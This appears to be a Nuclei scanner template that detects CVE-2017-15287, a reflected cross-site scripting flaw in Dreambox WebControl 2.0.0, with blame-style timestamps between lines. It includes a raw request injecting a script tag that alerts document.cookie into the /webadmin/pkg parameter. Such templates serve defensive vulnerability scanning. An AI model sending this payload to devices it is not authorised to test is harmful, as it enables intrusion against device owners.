2022-01-15 20:35:33 +00:00
id : CVE-2017-15287
info :
2022-04-29 19:58:07 +00:00
name : Dreambox WebControl 2.0.0 - Cross-Site Scripting
2022-01-15 20:35:33 +00:00
author : pikpikcu
severity : medium
2022-04-29 19:58:07 +00:00
description : |
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
2022-04-22 10:38:41 +00:00
reference :
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
2022-01-15 20:36:52 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-15 20:36:52 +00:00
cve-id : CVE-2017-15287
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : dreambox,edb,cve,cve2017,xss
2022-01-15 20:35:33 +00:00
requests :
- raw :
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers :
- type : word
words :
- 'Unknown command : <script>alert(document.cookie)</script>'
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/26